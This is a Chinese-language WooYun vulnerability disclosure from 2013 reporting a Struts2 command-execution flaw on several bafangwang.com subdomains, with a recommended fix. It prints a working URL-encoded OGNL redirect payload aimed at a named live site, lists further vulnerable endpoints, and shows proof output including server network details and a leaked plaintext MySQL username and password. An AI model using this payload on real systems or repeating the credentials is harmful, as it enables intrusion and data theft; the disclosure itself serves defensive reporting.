当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-033204

漏洞标题:八方网某站struts2命令执行漏洞

相关厂商:八方网

漏洞作者: 曹操

提交时间:2013-08-02 13:47

修复时间:2013-09-16 13:48

公开时间:2013-09-16 13:48

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-08-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-09-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt
发现已经泛滥了,各位手下留情吧!

详细说明:

http://www.bafangwang.com/cat.do?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
网上搜了一下,以下域名都在一个服务器上,赶紧修复吧!
同时检查一下服务器,清理一下web目录下的shell
http://www.bafangwang.com/cat.do
http://sso.bafangwang.com/security.action
http://bengbu.bafangwang.com/cat.do
http://chongqing.bafangwang.com/cat.do
http://hangzhou.bafangwang.com/yqlj.do
http://jinhua.bafangwang.com/storeDetail.do
http://2fwww.bafangwang.com/info_issuance/infoDetail.do

漏洞证明:

八方网.PNG


eth1 Link encap:Ethernet HWaddr 00:15:17:88:CB:2D
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:19 Memory:b8800000-b8820000
eth2 Link encap:Ethernet HWaddr 00:15:17:88:CB:2C
inet addr:121.52.210.177 Bcast:121.52.210.255 Mask:255.255.255.0
inet6 addr: fe80::215:17ff:fe88:cb2c/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:487582321 errors:139 dropped:0 overruns:0 frame:93
TX packets:462349471 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:87493367650 (81.4 GiB) TX bytes:361000438471 (336.2 GiB)
Interrupt:18 Memory:b8820000-b8840000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:693417818 errors:0 dropped:0 overruns:0 frame:0
TX packets:693417818 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1216582809504 (1.1 TiB) TX bytes:1216582809504 (1.1 TiB)
/dev/mapper/VolGroup-lv_root
50G 8.5G 39G 18% /
tmpfs 4.0G 0 4.0G 0% /dev/shm
/dev/sda1 485M 38M 422M 9% /boot
/dev/mapper/VolGroup-lv_home
402G 83G 299G 22% /home
<property name="driverClass" value="com.mysql.jdbc.Driver" />
<property name="jdbcUrl" value="jdbc:mysql://localhost/bfw_root?useUnicode=true&amp;characterEncoding=utf8" />
<property name="user" value="bfw" />
<property name="password" value="i2GYSDHANESpoLrQ1kW6uwQC" />

修复方案:

打struts2补丁,检查linux后门,删除web下面的shell

版权声明:转载请注明来源 曹操@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝